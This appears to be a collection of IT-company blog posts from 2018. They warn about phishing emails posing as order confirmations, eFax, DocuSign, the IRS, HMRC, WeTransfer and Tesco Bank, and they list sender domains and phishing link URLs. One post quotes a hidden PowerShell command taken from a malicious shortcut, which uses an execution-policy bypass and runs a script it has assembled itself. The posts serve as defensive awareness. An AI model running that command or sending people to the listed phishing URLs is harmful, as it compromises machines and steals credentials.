Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent
This email has been assembled by sourcing information from your personal history online, in this example they have sourced an old telephone number from somewhere, probably sold to them by our local council.
From: Direct <theo-letran@glampiny.com>
Sent: Thursday, August 9, 2018 6:35 AM
To: Receipent
Subject: Your Name, Pack(50RM_84248) confirmed: 7 items sent
| Order Acknowledgment | Dear Your name, Your order is now confirmed. Thanks for shopping with us! | | Billing Address:
Your Name
Your Telephone Number Postcode
Your Order Reference: 50RM_84248
Order Date: 8/9/2018 | Delivery Address:
Your Name
Your Telephone Number Postcode
|
| Your Order 50RM_84248 available here | Your right to cancel:
In addition to the EU and UK Distance Selling Regulations, we offer you 30 days to change your mind on any purchase.
To cancel the order, please complete the enclosed returns slip and return the item(s) to us at the address that is on the returns slip.
We recommend that you use a recorded delivery service.
Please note that you are responsible for the costs of returning the items to us unless the goods delivered are incorrect or faulty. In this case, you will be credited for the cost of your return up to a reasonable amount.
As soon as we receive your item(s) the returns procedure will be initiated and refunds will be processed. |
|
|
|
|
|
The actual link downloads a zip file:
The contents of the zip file are as follows:
And when extracted, reveal:
The image just being a Google Pay image:
And the shortcut linking to:
As we can see, this is another Windows Powershell command but one which which we cannot make head or tail of -
fildunare is not a term which any of us recognise, so any light anyone can shed would be most welcome.
Either way, it is attempting to find the string
fildunare with a .lnk extension in your documents and invokes desktop.ps1 which doesn't actually seem to be included with any version of Windows and so is a bit of a mystery.
Either way, make sure that .ps1 files are blocked inside of attachments, especially archive files, and this will not be an issue.
The originating email domain - glampiny.com - does not seem to be a website either so block that domain from your email server.
Spam Warning: You've received efax Notice
We have seen this email throughout this week:
From: eFax j2 Global <efax@ramatmed.com>
Sent: Tuesday, August 7, 2018 7:52 PM
To: Recipient
Subject: You've received efax Notice
Fax Message; ID: 4734 745 7735,
You have got a 6 page(s) fax at 08-07-2018 08:34:55 GMT.
*Your reference number is ek4_pid02-88444959724931-3463741-40.
Visit www.efax.com/efax-help-center if you have any questions relating to this notification.
The eFax Team
|
2002-2018 j2 Global, Inc. and affiliates. All rights reserved.
eFax is a trademark of j2 Global, Inc.
22592 Hollywood Blvd, Los Angeles, CA 98613
*** This is an automatic message, please do not reply directly to this email address *** Privacy Policy.
|
The 'Get Fax Now' link actually points to:
http://hvcrmls.info?82a6yp=QIUBNYQASHUBQYUDP Which appears to have already been removed but the site name is so bizarre, it makes you wonder if it ever existed. I am not going to invest time in looking it up but this email is spam and should be reported.
The sender
efax@ramatmed.com has a domain of what appears to be a Los Angeles medial supplier but the website is very spartan.
Spam Warning: You received notification from DocuSign Signature Service
You may see the following email, purportedly from DocuSign. We have seen it being captured by most spam guards but also getting through many on other occasions.
From: DocuSign Signature Service <docusign@pehache.com>
Sent: Monday, August 6, 2018 5:21 PM
To: Recipient
Subject: You received notification from DocuSign Signature Service
| 
| 
Review and sign this document. |
|
| Dear Receiver,
Please review this invoice
It is an automatically generated invoice. | | | This email contains a secure information. Do not share this code with other people. Additional Signing Way
Please visit DocuSign.com, click on 'Access Documents', and enter the security code: F80B75BEF7 About Our Service
Sign invoice electronically in just minutes. It's risk-free. Whether you're at work, home or even across the globe -- Our service gives a professional solution for Digital Transaction Management. Have questions about an Invoice?
In case you need to modify the document or have questions about the details in the document, reach out to the sender directly.
If you are having trouble signing the document, please see the Help with Signing page on our Webpage .
 Review Invoice
This message was sent to you by DocuSign Electronic Signature Service. |
| |
The folder appears to have already been removed.
Report any senders of this email, the pehache.com domain does not seem to function either.
Internal Revenue Service - Spam Warning !
Watch out for more free money!
This email has been received this week:
From: Internal Revenue Service <irs@aubodyshop.com>
Sent: Tuesday, July 31, 2018 6:16 PM
To: Recipient
Subject: Internal Revenue Service
|
Internal Revenue Service | IRS services Account Balance communication TP95 |
|
Final reminder: Notice of Intent to seize (levy) your current income tax refund.
promptly: $449.20 Our files indicate that you have unpaid sum for the tax year closing December 31,2017 (Application form ). If you don't call us straight away, we may levy (seize) your house or legal rights to own property which includes any kind of tax refund and also apply it for the amount of money you must pay back.
Download your payment Invoice
You're witnessing this particular notification due to the fact you're subscribed to our alerts via Internal revenue service.
If you no more want to get warnings, please log in to your Internal revenue service account to temporarily disable or completely delete these types of signals. The following alert is sent to you automatically from the IRS services. Make sure you do not Write back. |
Take care of your account, change your security password or e-mail, or discontinue messages at any time on your Personal preferences Web page.
If you have inquiries or problems with the service, be sure to contact www.paygov.us. .
This service is delivered to you free of charge by the Internal Revenue Service. The following communication is provided through: IRS 1364 Constitution St. N Washington DC 21263.
| 
|
As this email has been received from a car (auto if you're German/American) repair (body shop) in Indianapolis, we can safely say that it is a spam email.
Which has already been taken down - well done for spotting that whoever the owner is...
Anyway report this email as spam and stay vigilant!
Ooh, a tax refund!! SPAM - (1) New message from GB Revenue and Taxes.
This email has been received this week at sircles spam catcher:
From: TaxesGreat-Britain <seminar@toitumosi.jp>
Sent: Wednesday, August 1, 2018 9:26 AM
To: Support
Subject: (1) New message from GB Revenue and Taxes.
|
- |
Taxes&Revenue have detected that you have paid too much tax in the past |
|
| * Therefore we applied P800WForm to issue a reimbursment. --we tried to send it to you automatically. --we don't have your card details on file. --have your credit/debit card ready |
|
|
Reimbursement Information | * We applied P800WForm to issue a reimbursment. * Receipt date : 01 August 2018. * Amount: 670.25 GB P. |
|
| Delivery-Information | Card Type: | VISA | Credit Card: | ****-****-****-**** | Amount: | 670.25 | Transaction Date: | 01/08/2018 | Transaction #: | 419277 |
|
|
|
|
|
|
|
|
|
-
As you can see the originating address is actually from Japan and so probably isn't that likely to give me a tax refund after all :(
The GBP is a bit of a giveaway too, as even in London, most people still use the British Pound without being prompted.
The 'Claim Funds' link points to:
http://mocosi.co.za/img/acgetopai/ which is actually already registered as deceptive by Chrome and has been registered as unsafe by Microsoft Edge.
The actual site:
Once you choose your wishes they take you to:
HMRC do not know your banking details, and will never ask you to confirm your identity with your card details or account number. This site is not secure and should therefore not be accepting card details anyway.
Never enter card details without checking the padlock in the address bar is showing in green or as OK. Always check the domain in the address bar, all the way up until the first / and make sure it is just the expected domain like sircles.net with nothing following it unless after a /
Report this email and report the website.
Be safe!!!
Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent
This email has been spotted this week:
From: lou_weihe@clarityconfidenceandcash.com
Sent: Monday, July 30, 2018 10:52 PM
To: Recipient
Subject: Your, Name Pack(4M0A_8141) confirmed: 5 items sent
Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.
WOMEN | MEN | ACCESSORIES | HOME DECOR | GADGETS |
Hi Your Name, | Great news! Your order is now confirmed. We will email you again when your items ship.
Thanks for shopping with us! | |
|
This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us
| |
|
Which downloads a file: 4M0A_8141-order-Receipt.zip
Zip files are not often used as orders anyway but this website, https://johanwolf.com obviously has a valid certificate and is being misused by someone. The website just seems to forward to Office365 support for some reason???
If you unzip the file that is provided you see an image:
Which presumably pretends to be a real company.
And a file which runs a script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
Which will make serious changes to your system. Looking at this we are not sure it would work but might try it on an old PC ..?
We will let you know.
Anyway, report the sender and the website and keep vigilant!
Spam Warning: Important Docs Secured ShareFile Attachment
Watch out for this email doing the rounds this week:
From: Tracy Turner <tturner@brealzeta.com>
Sent: Thursday, July 19, 2018 5:07 PM
Subject: Important Docs
| Secured ShareFile Attachment | Expires July 20, 2018 | | | I used WeTransfer to send documents to you securely. Learn More. |
|
|
If you need any further assistance, then do not hesitate to contact me.
Tracy Turner
Breal Zeta CF Ltd
t: 07803 178446
The 'Review Documents' link actually points at https://theqfotaaerwrcgfd.co.uk/ces/ffw/(*%5E%25%26*(*%5E%24%25%5E%26%25%5E%24%25%23%23%24%25%5E%26
So be careful here - this is a fully secured SSL site with an SSL certificate:
The domain theqfotaaerwrcgfd.co.uk appears to be running on a CPanel server with a certificate from:
Comodo for CPanel.
From the look of the site:
They seem to impersonating WeTransfer and ShareFile at the same time, so this is obviously quite a big scam.
The website has been thoughtfully put together to steal important credentials and a person who knows a tracy turner could easily input all three of their Google, Office365 and GoDaddy details.
The GoDaddy one is crafty but obviously there are no documents storage houses in the world that would ask for your internet domain credentials.
If you click the 'others' option, then you are taken through to a WeTransfer impersonation site:
https://theqfotaaerwrcgfd.co.uk/ces/ffw/(*%5e%25&*(*%5e$%25%5e&%25%5e$%25%23%23$%25%5e&/email_signin/index.html
Which is again a convincing looking site using the same certificate.
The IP address gives this data:
% Information related to '89.36.218.0 - 89.36.218.255'
% Abuse contact for '89.36.218.0 - 89.36.218.255' is 'abuse@staff.aruba.it'
inetnum: 89.36.218.0 - 89.36.218.255
geoloc: 50.10 8.70
netname: CLOUD-DE
descr: Cloud Services DC05
country: DE
admin-c: SS936-RIPE
tech-c: AN3450-RIPE
status: ASSIGNED PA
mnt-by: ARUBA-MNT
mnt-lower: ARUBA-MNT
mnt-routes: XANDMAIL-MNT
created: 2016-01-11T14:37:36Z
last-modified: 2016-01-11T14:37:36Z
source: RIPE
role: ARUBA NOC
address: Aruba S.p.A.
address: via S.Clemente 53
address: 24036 Ponte San Pietro (BG)
address: Italy
abuse-mailbox: abuse@staff.aruba.it
admin-c: SS936-RIPE
tech-c: SC279-RIPE
nic-hdl: AN3450-RIPE
mnt-by: ARUBA-MNT
created: 2008-11-19T19:02:34Z
last-modified: 2017-11-15T08:13:57Z
source: RIPE # Filtered
person: Susanna Santini
address: Aruba S.p.A.
address: Via S.Clemente, 53
address: 24036 Ponte San Pietro (BG)
phone: +39 0575 0505
fax-no: +39 0575 862000
nic-hdl: SS936-RIPE
mnt-by: ARUBA-MNT
created: 1970-01-01T00:00:00Z
last-modified: 2017-11-15T08:14:40Z
source: RIPE # Filtered
% Information related to '89.36.216.0/22AS200185'
route: 89.36.216.0/22
descr: Aruba GmbH Cloud Network DC05
origin: AS200185
mnt-by: ARUBA-MNT
created: 2015-12-09T12:07:07Z
last-modified: 2015-12-09T12:07:25Z
source: RIPE
We will email the abuse address to report these sites...
Spam warning - HelloFax, Someone Sent You a Fax
This email has been received in the last couple of days:
From: HelloFax <hellofax@abramscpa.com>
Sent: Monday, July 9, 2018 3:22 PM
To: Recipient
Subject: HelloFax, Someone Sent You a Fax
The best way to sign and send faxes on-line Dear Customer,Here is Your HelloFax
Date and Time: 07/09/2018 08:10 AM
Number of pages: 9
Reference number: TGD656358K.
Thank you for going paperless!
- HelloFax Team |
|
|
Please report this message as spam anyway to get the source address blacklisted.
19. June 2018 10:14 by sirclesadmin in
Online Fraud, SPAM SPAM: yourdomain.com Final Extension
Another domain renewal scam is circulating this week.
The format is the same as usual - danger, danger danger, about to expire, your domain, final warning etc.
Then right at the bottom it says something like:
Failure to make payment may result in account closing (making it difficult for your customers and your friends to locate you, using search engines on the web).
So it is actually a service to submit you to search engines.
Well there is only really one search engine unfortunately, although Ecosia's plan is a good one, so there is no need to pay someone to submit your pages. Google are quite capable of finding you themselves.
The email arrives as:
- ACT IMMEDIATELY -FINAL EXTENSIONPURCHASE EXPIRATION DATE: 06.26.2018 |
Final Extension | | LAST OVERDUE NOTICE FOR DOMAIN | Notice#: 049436077 | your domain | Date: 06.19.2018 |
DOMAIN: yourdomain.suffixACCOUNT BALANCE: $0.00 |
TO CARRY OUT YOUR PAYMENT |
Your Name | Address | Town | Region, Post Code, Country |
Domain Name: | Registration Period: | Price: | Term: | YourDomain.suffix | Today to One year away | $84.00 | 1 Year |
| | PLEASE CLICK ON | PAYMENTOVERDUE FOR |
yourdomain.suffix
| ACT TODAY! |
Dear Your Name, | This is the final billing notice to complete this order by 1 Week failure to make payment may result in account closing (making it difficult for your customers and your friends to locate you, using search engines on the web). |
| | PLEASE NOTE: | This Email contains information intended only for the individuals or entities to which it is addressed. If you are not the intended recipient or the agent responsible for delivering it to the intended recipient, or have received this Email in error, please notify immediately the sender of this Email and then completely delete it (including any attachments). Any other action taken in reliance upon this Email is strictly prohibited, including but not limited to unauthorized copying, printing, disclosure, or distribution. The sender bears no responsibility for any loss, disruption or damage to your data or computer system that may occur while using data contained in, or transmitted with, this Email. Any views expressed are personal unless otherwise stated. unlike here Providing false information will result in suspension of the customer's account.Thank you for your cooperation. |
|
|
|
The unsubscribe link points to: http://yourdomain.com.onlineadvice.top/unsubscribe/
The secure payment link links to: http://yourdomain.suffix.onlineadvice.top/?d=yourdomain&y=06.27.2018
Report the website onlineadvice.top as spam and the website it takes you to: seockaccepted.org should be reported as a phishing site.
Report the email as spam.
Many thanks.
SECURITY ALERT - Tesco Bank Spam Scam
Beware of these fake Tesco spam emails:
From: TescoBankOnline@mail.net
Sent: 11 June 2018 16:24
To: Recipient
Subject: SECURITY ALERT
SECURITY ALERT
You are receiving this email because we noticed an attempt to sign in to your account from an unrecognised device. Our system has blocked this sign in attempt as a security measure.
In order to safeguard your account information we have temporarily restricted your access to certain features within our online banking system. To restore full access please click the link below to validate your account information.
Please note: Failure to restore full access can lead to permanent suspension of access to our online banking service.
==================================================
Get Started ⇨
==================================================
Best regards,
Tesco Online Banking Team
The 'Get Started' link actually takes you to: https://newsforeveryone.top/tescoOnline/index.php
Cloud Flare have already labelled this site as phishing:
